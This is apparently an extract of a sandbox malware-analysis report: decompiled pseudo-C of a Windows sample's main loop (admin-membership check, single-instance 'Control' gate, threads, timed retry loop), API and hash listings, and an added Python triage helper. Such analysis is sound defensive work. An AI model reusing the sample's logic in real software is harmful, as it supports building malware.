                                                                                    				_v8 = _t113 ^ _t260;
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_push(__edi);
                                                                                    				_t115 = E04ECA980();
                                                                                    				_v536 = 0;
                                                                                    				_t242 = _t115;
                                                                                    				_v540 = 0;
                                                                                    				E04EC9360(__ebx,  &_v544, __edi, _t242, _t264, L"Control");
                                                                                    				if(_v544 != 0 || _t242 != 0 && _v544 != 0) {
                                                                                    					_t117 = _v536;
                                                                                    					__eflags = _t117;
                                                                                    					if(_t117 != 0) {
                                                                                    						CloseHandle(_t117);
                                                                                    					}
                                                                                    					goto L69;
                                                                                    				} else {
                                                                                    					SetErrorMode(1);
                                                                                    					_t122 = GetTickCount();
                                                                                    					wsprintfA( &_v316, "Global\\%d%d", GetTickCount(), _t122);
                                                                                    					_t261 = _t260 + 0x10;
                                                                                    					_t268 = _t242;
                                                                                    					if(_t242 != 0) {
                                                                                    						CloseHandle(CreateThread(0, 0, E04ECBCE0, 0, 0, 0));
                                                                                    						if(E04EBE850(CloseHandle, _t231, CreateThread, _t268) > 0) {
                                                                                    							CloseHandle(CreateThread(0, 0, E04EBE6B0, 0, 0, 0));
                                                                                    						}
                                                                                    					}
                                                                                    					E04EBA330();
                                                                                    					_t199 = 0;
                                                                                    					_v552 = 0;
                                                                                    					while(1) {
                                                                                    						L7:
                                                                                    						_t129 = memcpy( &_v516, 0x4f05318, 0x31 << 2);
                                                                                    						_t261 = _t261 + 0xc;
                                                                                    						asm("movsw");
                                                                                    						_t271 = _t129;
                                                                                    						if(_t129 == 0) {
                                                                                    							_t189 = E04ED5744(0x4f05318, _t271, 0x3c);
                                                                                    							_t261 = _t261 + 4;
                                                                                    							_t129 = E04EB62B0(_t199, _t189, 0x4f0537a, _t271);
                                                                                    							 *0x4f068d0 = _t129;
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t129 + 0x38)) != 0) {
                                                                                    							memcpy( &_v516, 0x4f053de, 0x31 << 2);
                                                                                    							_t261 = _t261 + 0xc;
                                                                                    							asm("movsw");
                                                                                    						}
                                                                                    						_t245 = 0;
                                                                                    						_v548 = 0;
                                                                                    						if((_v320 & 0x0000ffff) + 1 == 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_t236 = _v552;
                                                                                    						do {
                                                                                    							if(_t236 != 0) {
                                                                                    								E04EB8C80(_t236);
                                                                                    								_t142 =  *(_t236 + 0x50);
                                                                                    								if( *(_t236 + 0x50) != 0) {
                                                                                    									E04ED573F(_t142);
                                                                                    									_t261 = _t261 + 4;
                                                                                    								}
                                                                                    								 *(_t236 + 0x58) = 0;
                                                                                    								 *(_t236 + 0x50) = 0;
                                                                                    								 *(_t236 + 0x54) = 0;
                                                                                    								 *((intOrPtr*)(_t236 + 0x30)) = 0x4efcf88;
                                                                                    								 *((intOrPtr*)(_t236 + 0x28)) = 0x4efd008;
                                                                                    								_t143 =  *((intOrPtr*)(_t236 + 0x1c));
                                                                                    								if( *((intOrPtr*)(_t236 + 0x1c)) != 0) {
                                                                                    									E04ED573F(_t143);
                                                                                    									_t261 = _t261 + 4;
                                                                                    								}
                                                                                    								_push(0x60);
                                                                                    								E04ED5777(_t236);
                                                                                    								_t261 = _t261 + 8;
                                                                                    								_t236 = 0;
                                                                                    								_v552 = 0;
                                                                                    							}
                                                                                    							if(_t199 != 0) {
                                                                                    								 *((intOrPtr*)( *_t199))(1);
                                                                                    								_t199 = 0;
                                                                                    							}
                                                                                    							if(_t245 != 0) {
                                                                                    								E04ECB090(_t199,  &_v204, _t236, _t245,  &_v380,  &_v340);
                                                                                    								_t261 = _t261 + 8;
                                                                                    								goto L26;
                                                                                    							} else {
                                                                                    								_t208 = 0;
                                                                                    								asm("o16 nop [eax+eax]");
                                                                                    								do {
                                                                                    									_t138 =  *(_t261 + _t208 + 0x38) & 0x0000ffff;
                                                                                    									_t208 = _t208 + 2;
                                                                                    									 *(_t261 + _t208 + 0x166) = _t138;
                                                                                    								} while (_t138 != 0);
                                                                                    								L26:
                                                                                    								_t135 = 0;
                                                                                    								_v544 = 0;
                                                                                    								do {
                                                                                    									_t246 =  &_v516;
                                                                                    									_t247 = _t246 + _t135 * 2;
                                                                                    									_v524 = _t246 + _t135 * 2;
                                                                                    									if( *(_t246 + _t135 * 2) == 0) {
                                                                                    										goto L38;
                                                                                    									}
                                                                                    									_t206 =  &_v512;
                                                                                    									_t284 =  *((short*)(_t206 + _t135 * 2));
                                                                                    									_v540 = _t206 + _t135 * 2;
                                                                                    									if( *((short*)(_t206 + _t135 * 2)) == 0) {
                                                                                    										goto L38;
                                                                                    									}
                                                                                    									_t236 = E04ED5744(_t247, _t284, 0x60);
                                                                                    									_v552 = _t236;
                                                                                    									E04EB7970(_t236);
                                                                                    									 *((intOrPtr*)(_t236 + 0x28)) = 0x4efd048;
                                                                                    									 *(_t236 + 0x2c) = 0;
                                                                                    									 *((intOrPtr*)(_t236 + 0x30)) = 0x4efd024;
                                                                                    									 *(_t236 + 0x34) = 0;
                                                                                    									 *(_t236 + 0x58) = 0;
                                                                                    									 *(_t236 + 0x50) = 0;
                                                                                    									 *(_t236 + 0x54) = 0;
                                                                                    									 *(_t236 + 0x40) = 0;
                                                                                    									 *(_t236 + 0x20) = 0;
                                                                                    									 *(_t236 + 0x24) = 0;
                                                                                    									 *(_t236 + 0x38) = 0;
                                                                                    									 *((char*)(_t236 + 0x3c)) = 0x43;
                                                                                    									E04EB8AD0(_t236,  *_t247 & 0x0000ffff);
                                                                                    									_t150 = GetTickCount();
                                                                                    									_t261 = _t261 + 4 - 0xc;
                                                                                    									_t250 = _t150;
                                                                                    									_push( *_v544 & 0x0000ffff);
                                                                                    									_push( &_v208);
                                                                                    									_t152 = E04EB8BA0(_t236);
                                                                                    									_t285 = _t152;
                                                                                    									if(_t152 == 0) {
                                                                                    										L37:
                                                                                    										_t135 = _v544;
                                                                                    										goto L38;
                                                                                    									}
                                                                                    									_v520 = GetTickCount() - _t250;
                                                                                    									_t199 = E04ED5744(_t250, _t285, 0x11c);
                                                                                    									_t263 = _t261 + 4;
                                                                                    									_t251 =  *_v524 & 0x0000ffff;
                                                                                    									_t158 = _v552;
                                                                                    									 *_t199 = 0x4efd8b0;
                                                                                    									 *((intOrPtr*)(_t199 + 4)) = _t158;
                                                                                    									 *(_t158 + 0x38) = _t199;
                                                                                    									 *((intOrPtr*)(_t199 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                    									_t69 = _t199 + 0xc; // 0xc
                                                                                    									 *_t199 = 0x4efd1a0;
                                                                                    									 *0x4f068d4 =  *_v524 & 0x0000ffff;
                                                                                    									lstrcpyA(_t69,  &_v308);
                                                                                    									lstrcpyW(0x4f068d8,  &_v204);
                                                                                    									_t165 =  *0x4f068d0; // 0x0
                                                                                    									 *0x4f03760 =  *_v540 & 0x0000ffff;
                                                                                    									_t236 = _v552;
                                                                                    									 *(_t199 + 0x118) = 0;
                                                                                    									 *(_t199 + 0x114) = 0;
                                                                                    									 *((char*)(_t199 + 0x110)) = 0;
                                                                                    									 *(_t236 + 0x38) = _t199;
                                                                                    									_t286 = _t165;
                                                                                    									if(_t165 == 0) {
                                                                                    										_t187 = E04ED5744(_t251, _t286, 0x3c);
                                                                                    										_t263 = _t263 + 4;
                                                                                    										 *0x4f068d0 = E04EB62B0(_t199, _t187, _t236, _t286);
                                                                                    									}
                                                                                    									_t216 = _t236;
                                                                                    									_t166 = E04ECAD50(_t199, _t216, _v520, _t236, _t251, 0x4f054a4, L"20211002", L"v2021002",  *((intOrPtr*)(_t165 + 0x30)));
                                                                                    									_t261 = _t263 + 0x10;
                                                                                    									if(_t166 == 0) {
                                                                                    										goto L37;
                                                                                    									} else {
                                                                                    										_t252 = 0;
                                                                                    										while( *((char*)(_t199 + 0x110)) == 0) {
                                                                                    											Sleep(0x3e8);
                                                                                    											_t252 = _t252 + 1;
                                                                                    											if(_t252 < 0x3c) {
                                                                                    												continue;
                                                                                    											}
                                                                                    											if( *((char*)(_t199 + 0x110)) != 0) {
                                                                                    												break;
                                                                                    											}
                                                                                    											goto L37;
                                                                                    										}
                                                                                    										__eflags = _t236;
                                                                                    										if(__eflags == 0) {
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										__eflags = _t199;
                                                                                    										if(__eflags == 0) {
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										_t167 =  *0x4f068d0; // 0x0
                                                                                    										_v316 = 0xa0;
                                                                                    										__eflags = _t167;
                                                                                    										if(__eflags == 0) {
                                                                                    											_t186 = E04ED5744(_t252, __eflags, 0x3c);
                                                                                    											_t261 = _t261 + 4;
                                                                                    											_t216 = _t186;
                                                                                    											_t167 = E04EB62B0(_t199, _t216, _t236, __eflags);
                                                                                    											 *0x4f068d0 = _t167;
                                                                                    										}
                                                                                    										_push(_t216);
                                                                                    										_push(0x3f);
                                                                                    										_v315 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x28)) + 0x14));
                                                                                    										_push(5);
                                                                                    										_push( &_v316);
                                                                                    										E04EB1C60( *((intOrPtr*)(_t199 + 4)));
                                                                                    										do {
                                                                                    											_t173 = OpenEventA(0x1f0003, 0,  &_v309);
                                                                                    											_t229 =  *(_t236 + 0x5c) & 0x0000ffff;
                                                                                    											_v549 = _t173;
                                                                                    											__eflags = _t229 - 1;
                                                                                    											if(_t229 != 1) {
                                                                                    												L49:
                                                                                    												__eflags = _t229 - 2;
                                                                                    												if(_t229 != 2) {
                                                                                    													L56:
                                                                                    													_t174 =  *(_t199 + 0x118) * 0x3e8;
                                                                                    													__eflags = _t174;
                                                                                    													Sleep(_t174);
                                                                                    													L57:
                                                                                    													_t218 =  *0x4f068cc; // 0x0
                                                                                    													__eflags = _t218;
                                                                                    													if(_t218 != 0) {
                                                                                    														_t181 =  *((intOrPtr*)(_t218 + 4));
                                                                                    														__eflags =  *(_t181 + 4);
                                                                                    														if( *(_t181 + 4) != 0) {
                                                                                    															 *((char*)(_t218 + 1)) = 0;
                                                                                    															E04EBA290(_t218, _t218);
                                                                                    															 *0x4f068cc = 0;
                                                                                    														}
                                                                                    													}
                                                                                    													_t254 = _v549;
                                                                                    													__eflags = _t254;
                                                                                    													if(__eflags == 0) {
                                                                                    														goto L7;
                                                                                    													} else {
                                                                                    														_t219 =  *(_t236 + 0x20);
                                                                                    														 *(_t236 + 0x44) = 1;
                                                                                    														__eflags = _t219;
                                                                                    														if(_t219 != 0) {
                                                                                    															L64:
                                                                                    															 *((intOrPtr*)( *_t219 + 4))();
                                                                                    															L65:
                                                                                    															CloseHandle(_t254);
                                                                                    															SetErrorMode(0);
                                                                                    															_t179 = _v529;
                                                                                    															__eflags = _t179;
                                                                                    															if(_t179 != 0) {
                                                                                    																CloseHandle(_t179);
                                                                                    															}
                                                                                    															L69:
                                                                                    															__eflags = _v8 ^ _t260;
                                                                                    															return E04ED572E(_v8 ^ _t260);
                                                                                    														}
                                                                                    														_t220 =  *(_t236 + 0x24);
                                                                                    														__eflags = _t220;
                                                                                    														if(_t220 == 0) {
                                                                                    															goto L65;
                                                                                    														}
                                                                                    														_t219 = _t220 + 4;
                                                                                    														__eflags = _t219;
                                                                                    														goto L64;
                                                                                    													}
                                                                                    												}
                                                                                    												_t221 =  *(_t236 + 0x24);
                                                                                    												__eflags = _t221;
                                                                                    												if(_t221 == 0) {
                                                                                    													goto L56;
                                                                                    												}
                                                                                    												_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t221 + 4)) + 0x40))();
                                                                                    												__eflags = _t184;
                                                                                    												if(_t184 == 0) {
                                                                                    													goto L56;
                                                                                    												}
                                                                                    												__eflags =  *(_t236 + 0x48);
                                                                                    												L53:
                                                                                    												if(__eflags == 0) {
                                                                                    													goto L56;
                                                                                    												}
                                                                                    												goto L54;
                                                                                    											}
                                                                                    											_t223 =  *(_t236 + 0x20);
                                                                                    											__eflags = _t223;
                                                                                    											if(_t223 == 0) {
                                                                                    												goto L49;
                                                                                    											}
                                                                                    											__eflags =  *((intOrPtr*)( *_t223 + 0x40))();
                                                                                    											goto L53;
                                                                                    											L54:
                                                                                    											Sleep(0x1f4);
                                                                                    											__eflags = _v549;
                                                                                    										} while (_v549 == 0);
                                                                                    										goto L57;
                                                                                    									}
                                                                                    									L38:
                                                                                    									_t135 = _t135 + 1;
                                                                                    									_v544 = _t135;
                                                                                    								} while (_t135 < 2);
                                                                                    							}
                                                                                    							_t245 = _v548 + 1;
                                                                                    							_v548 = _t245;
                                                                                    						} while (_t245 < (_v320 & 0x0000ffff) + 1);
                                                                                    						break;
                                                                                    					}
                                                                                    					L40:
                                                                                    					Sleep(0x2710);
                                                                                    					goto L7;
                                                                                    				}
			}

[Instruction address column for the function starting at 0x04ecb280 (entries from 0x04ecb280 through 0x04ecb7d5, plus several 0x00000000 entries); the instruction text that accompanied these addresses was not preserved in this extract.]
                                                                                    0x04ecb490
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb496
                                                                                    0x04ecb49a
                                                                                    0x04ecb4a2
                                                                                    0x04ecb4a6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb4b6
                                                                                    0x04ecb4bb
                                                                                    0x04ecb4c1
                                                                                    0x04ecb4c6
                                                                                    0x04ecb4cf
                                                                                    0x04ecb4d6
                                                                                    0x04ecb4dd
                                                                                    0x04ecb4e4
                                                                                    0x04ecb4eb
                                                                                    0x04ecb4f2
                                                                                    0x04ecb4fa
                                                                                    0x04ecb501
                                                                                    0x04ecb508
                                                                                    0x04ecb50f
                                                                                    0x04ecb516
                                                                                    0x04ecb51a
                                                                                    0x04ecb51f
                                                                                    0x04ecb529
                                                                                    0x04ecb52c
                                                                                    0x04ecb538
                                                                                    0x04ecb539
                                                                                    0x04ecb53c
                                                                                    0x04ecb541
                                                                                    0x04ecb543
                                                                                    0x04ecb656
                                                                                    0x04ecb656
                                                                                    0x00000000
                                                                                    0x04ecb656
                                                                                    0x04ecb556
                                                                                    0x04ecb55f
                                                                                    0x04ecb561
                                                                                    0x04ecb56a
                                                                                    0x04ecb57a
                                                                                    0x04ecb57e
                                                                                    0x04ecb584
                                                                                    0x04ecb587
                                                                                    0x04ecb590
                                                                                    0x04ecb59b
                                                                                    0x04ecb59e
                                                                                    0x04ecb5a5
                                                                                    0x04ecb5ac
                                                                                    0x04ecb5bf
                                                                                    0x04ecb5c5
                                                                                    0x04ecb5ca
                                                                                    0x04ecb5d1
                                                                                    0x04ecb5d5
                                                                                    0x04ecb5df
                                                                                    0x04ecb5e9
                                                                                    0x04ecb5f0
                                                                                    0x04ecb5f3
                                                                                    0x04ecb5f5
                                                                                    0x04ecb5f9
                                                                                    0x04ecb5fe
                                                                                    0x04ecb608
                                                                                    0x04ecb608
                                                                                    0x04ecb614
                                                                                    0x04ecb625
                                                                                    0x04ecb62a
                                                                                    0x04ecb62f
                                                                                    0x00000000
                                                                                    0x04ecb631
                                                                                    0x04ecb631
                                                                                    0x04ecb633
                                                                                    0x04ecb641
                                                                                    0x04ecb647
                                                                                    0x04ecb64b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb654
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb654
                                                                                    0x04ecb692
                                                                                    0x04ecb694
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb696
                                                                                    0x04ecb698
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb69a
                                                                                    0x04ecb69f
                                                                                    0x04ecb6a7
                                                                                    0x04ecb6a9
                                                                                    0x04ecb6ad
                                                                                    0x04ecb6b2
                                                                                    0x04ecb6b5
                                                                                    0x04ecb6b7
                                                                                    0x04ecb6bc
                                                                                    0x04ecb6bc
                                                                                    0x04ecb6c4
                                                                                    0x04ecb6c8
                                                                                    0x04ecb6cd
                                                                                    0x04ecb6db
                                                                                    0x04ecb6dd
                                                                                    0x04ecb6de
                                                                                    0x04ecb6f0
                                                                                    0x04ecb6ff
                                                                                    0x04ecb705
                                                                                    0x04ecb709
                                                                                    0x04ecb70d
                                                                                    0x04ecb710
                                                                                    0x04ecb722
                                                                                    0x04ecb722
                                                                                    0x04ecb725
                                                                                    0x04ecb751
                                                                                    0x04ecb751
                                                                                    0x04ecb751
                                                                                    0x04ecb75c
                                                                                    0x04ecb75e
                                                                                    0x04ecb75e
                                                                                    0x04ecb764
                                                                                    0x04ecb766
                                                                                    0x04ecb768
                                                                                    0x04ecb76b
                                                                                    0x04ecb76f
                                                                                    0x04ecb772
                                                                                    0x04ecb776
                                                                                    0x04ecb77b
                                                                                    0x04ecb77b
                                                                                    0x04ecb76f
                                                                                    0x04ecb785
                                                                                    0x04ecb789
                                                                                    0x04ecb78b
                                                                                    0x00000000
                                                                                    0x04ecb791
                                                                                    0x04ecb791
                                                                                    0x04ecb794
                                                                                    0x04ecb79b
                                                                                    0x04ecb79d
                                                                                    0x04ecb7a9
                                                                                    0x04ecb7ab
                                                                                    0x04ecb7ae
                                                                                    0x04ecb7b5
                                                                                    0x04ecb7b9
                                                                                    0x04ecb7bf
                                                                                    0x04ecb7c3
                                                                                    0x04ecb7c5
                                                                                    0x04ecb7c8
                                                                                    0x04ecb7c8
                                                                                    0x04ecb7db
                                                                                    0x04ecb7e7
                                                                                    0x04ecb7f1
                                                                                    0x04ecb7f1
                                                                                    0x04ecb79f
                                                                                    0x04ecb7a2
                                                                                    0x04ecb7a4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb7a6
                                                                                    0x04ecb7a6
                                                                                    0x00000000
                                                                                    0x04ecb7a6
                                                                                    0x04ecb78b
                                                                                    0x04ecb727
                                                                                    0x04ecb72a
                                                                                    0x04ecb72c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb734
                                                                                    0x04ecb737
                                                                                    0x04ecb739
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb73b
                                                                                    0x04ecb73f
                                                                                    0x04ecb73f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb73f
                                                                                    0x04ecb712
                                                                                    0x04ecb715
                                                                                    0x04ecb717
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecb71e
                                                                                    0x00000000
                                                                                    0x04ecb741
                                                                                    0x04ecb746
                                                                                    0x04ecb748
                                                                                    0x04ecb748
                                                                                    0x00000000
                                                                                    0x04ecb74f
                                                                                    0x04ecb65a
                                                                                    0x04ecb65a
                                                                                    0x04ecb65b
                                                                                    0x04ecb65f
                                                                                    0x04ecb480
                                                                                    0x04ecb674
                                                                                    0x04ecb676
                                                                                    0x04ecb67a
                                                                                    0x00000000
                                                                                    0x04ecb3c4
                                                                                    0x04ecb682
                                                                                    0x04ecb687
                                                                                    0x00000000
                                                                                    0x04ecb687

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                      • Part of subcall function 04EC9360: wsprintfW.USER32 ref: 04EC939E
                                                                                      • Part of subcall function 04EC9360: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                      • Part of subcall function 04EC9360: GetLastError.KERNEL32 ref: 04EC93C1
                                                                                      • Part of subcall function 04EC9360: CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 04ECB2DE
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB2EA
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB2ED
                                                                                    • wsprintfA.USER32 ref: 04ECB2FD
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04ECBCE0,00000000,00000000,00000000), ref: 04ECB325
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB328
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EBE6B0,00000000,00000000,00000000), ref: 04ECB342
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB345
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB51F
                                                                                    • GetTickCount.KERNEL32 ref: 04ECB549
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04ECB58A
                                                                                    • lstrcpyA.KERNEL32(0000000C,?), ref: 04ECB5AC
                                                                                    • lstrcpyW.KERNEL32 ref: 04ECB5BF
                                                                                    • Sleep.KERNEL32(000003E8), ref: 04ECB641
                                                                                    • Sleep.KERNEL32(00002710,Control), ref: 04ECB687
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 04ECB6FF
                                                                                    • Sleep.KERNEL32(000001F4), ref: 04ECB746
                                                                                    • Sleep.KERNEL32(?), ref: 04ECB75C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ECB7B5
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 04ECB7B9
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ECB7C8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04ECB7D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CountCreateSleepTick$ErrorEvent$ModeThreadlstrcpywsprintf$AllocateCheckFreeInitializeLastMembershipOpenToken
                                                                                    • String ID: 20211002$Control$Global\%d%d$v2021002
                                                                                    • API String ID: 621048162-1793688938
                                                                                    • Opcode ID: a70baead9bcbb5d9cb9fce250190fc5d7b4d12517bda983ec04a6e757508fa12
                                                                                    • Instruction ID: 6832ab6bed5762918345aa236ac4b7d22642ad05a8ebb73071a8423ff7106238
                                                                                    • Opcode Fuzzy Hash: a70baead9bcbb5d9cb9fce250190fc5d7b4d12517bda983ec04a6e757508fa12
                                                                                    • Instruction Fuzzy Hash: 79E1B370604301AFE724DF64E985BABB7E4FF84708F04152CE9459B280EBB5F855CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
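The API list above can be triaged mechanically. The Python helper below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses lines in the listing's "• Api.DLL(args), ref: addr" format (the embedded sample lines are copied from the APIs block above) and derives what an analyst notes first from such a block: the Sleep delays in milliseconds, the start routines handed to CreateThread (the next functions to open in the report), the RID passed to AllocateAndInitializeSid, and the access mask OpenEventA requests. The RID-to-name table assumes the NT identifier authority (S-1-5); the listing shows that argument only as "?", so the authority is an assumption, not something the page confirms.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: lines copied from the "APIs" block of the listing above.
API_LINES = """\
• Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
• Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
• SetErrorMode.KERNEL32(00000001), ref: 04ECB2DE
• GetTickCount.KERNEL32 ref: 04ECB2EA
• CreateThread.KERNEL32(00000000,00000000,04ECBCE0,00000000,00000000,00000000), ref: 04ECB325
• CreateThread.KERNEL32(00000000,00000000,04EBE6B0,00000000,00000000,00000000), ref: 04ECB342
• Sleep.KERNEL32(000003E8), ref: 04ECB641
• Sleep.KERNEL32(00002710,Control), ref: 04ECB687
• OpenEventA.KERNEL32(001F0003,00000000,?,?,00000005,0000003F), ref: 04ECB6FF
• Sleep.KERNEL32(000001F4), ref: 04ECB746
• Sleep.KERNEL32(?), ref: 04ECB75C
"""

# One listing line: optional "Part of subcall function XXXX:", then Api.DLL(args), ref: address.
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list                 # int for hex literals, str for recovered strings, None for '?'
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # containing function when the line is a "Part of subcall" entry


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]+", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["dll"], args, int(m["ref"], 16), sub))
    return calls


def sleep_ms(calls: List[ApiCall]) -> Tuple[List[int], int]:
    """Sleep(dwMilliseconds): known delays in ms, plus how many Sleeps had an unrecovered argument."""
    known, unknown = [], 0
    for c in calls:
        if c.api == "Sleep":
            if c.args and isinstance(c.args[0], int):
                known.append(c.args[0])
            else:
                unknown += 1
    return known, unknown


def thread_entry_points(calls: List[ApiCall]) -> List[int]:
    """CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, ...): the third argument
    is the new thread's start routine, i.e. the next function to pivot to in the listing."""
    return [c.args[2] for c in calls
            if c.api == "CreateThread" and len(c.args) > 2 and isinstance(c.args[2], int)]


# Single-sub-authority well-known RIDs (winnt.h). Assumes the NT authority S-1-5; the listing
# shows the identifier-authority pointer only as '?', so that part is not recovered from the page.
WELL_KNOWN_RIDS = {18: "SECURITY_LOCAL_SYSTEM_RID", 19: "SECURITY_LOCAL_SERVICE_RID",
                   20: "SECURITY_NETWORK_SERVICE_RID", 32: "SECURITY_BUILTIN_DOMAIN_RID"}


def sid_being_checked(calls: List[ApiCall]) -> Optional[Tuple[int, str]]:
    """AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0, ..., sub7, ppSid)."""
    for c in calls:
        if c.api == "AllocateAndInitializeSid" and len(c.args) >= 3 and c.args[1] == 1:
            return c.args[2], WELL_KNOWN_RIDS.get(c.args[2], "unknown RID")
    return None


EVENT_ALL_ACCESS = 0x001F0003  # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3
ACCESS_BITS = [(0x1, "EVENT_QUERY_STATE"), (0x2, "EVENT_MODIFY_STATE"), (0x10000, "DELETE"),
               (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"),
               (0x100000, "SYNCHRONIZE")]


def decode_event_access(mask: int) -> List[str]:
    """Expand the dwDesiredAccess of OpenEvent into named rights."""
    if mask == EVENT_ALL_ACCESS:
        return ["EVENT_ALL_ACCESS"]
    return [name for bit, name in ACCESS_BITS if mask & bit]


def open_event_access(calls: List[ApiCall]) -> List[List[str]]:
    return [decode_event_access(c.args[0]) for c in calls
            if c.api.startswith("OpenEvent") and c.args and isinstance(c.args[0], int)]
```

On the embedded sample, sleep_ms returns the 1000, 10000 and 500 ms delays plus one Sleep whose argument the decompiler did not recover, thread_entry_points returns 0x04ECBCE0 and 0x04EBE6B0, sid_being_checked returns RID 18, and open_event_access reports EVENT_ALL_ACCESS. The "Part of subcall" lines are kept but tagged with their containing function (subcall_of), so they are not mistaken for this function's own call sites when counting.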

                                                                                    C-Code - Quality: 65%
                                                                                    			E04EBD550(void* __edi, void* __esi) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v16;
                                                                                    				short _v540;
                                                                                    				void* _v544;
                                                                                    				void* _v548;
                                                                                    				void* _v552;
                                                                                    				long _v556;
                                                                                    				signed int* _v560;
                                                                                    				intOrPtr _v576;
                                                                                    				intOrPtr _v580;
                                                                                    				intOrPtr _v584;
                                                                                    				intOrPtr _v588;
                                                                                    				_Unknown_base(*)() _v592;
                                                                                    				intOrPtr _v596;
                                                                                    				intOrPtr _v600;
                                                                                    				void* _v604;
                                                                                    				signed int _t97;
                                                                                    				_Unknown_base(*)()* _t102;
                                                                                    				signed int _t108;
                                                                                    				void* _t109;
                                                                                    				void* _t111;
                                                                                    				int _t125;
                                                                                    				signed int _t133;
                                                                                    				void* _t135;
                                                                                    				void* _t137;
                                                                                    				void* _t143;
                                                                                    				signed int* _t144;
                                                                                    				signed int* _t148;
                                                                                    				int _t161;
                                                                                    				signed int _t169;
                                                                                    				signed int* _t178;
                                                                                    				intOrPtr _t179;
                                                                                    				long _t180;
                                                                                    				_Unknown_base(*)()* _t184;
                                                                                    				intOrPtr _t185;
                                                                                    				long _t186;
                                                                                    				intOrPtr _t188;
                                                                                    				intOrPtr _t193;
                                                                                    				struct HINSTANCE__* _t195;
                                                                                    				signed int _t197;
                                                                                    				void* _t199;
                                                                                    				signed int* _t201;
                                                                                    				void* _t202;
                                                                                    				long _t204;
                                                                                    				void* _t208;
                                                                                    				void* _t211;
                                                                                    				signed int _t215;
                                                                                    				void* _t219;
                                                                                    				signed int _t222;
                                                                                    				void* _t223;
                                                                                    				void* _t228;
                                                                                    				void* _t231;
                                                                                    				void* _t233;
                                                                                    
                                                                                    				_t222 = (_t219 - 0x00000008 & 0xfffffff0) + 4;
                                                                                    				_v8 =  *((intOrPtr*)(_t219 + 4));
                                                                                    				_t215 = _t222;
                                                                                    				_t223 = _t222 - 0x258;
                                                                                    				_t97 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v16 = _t97 ^ _t215;
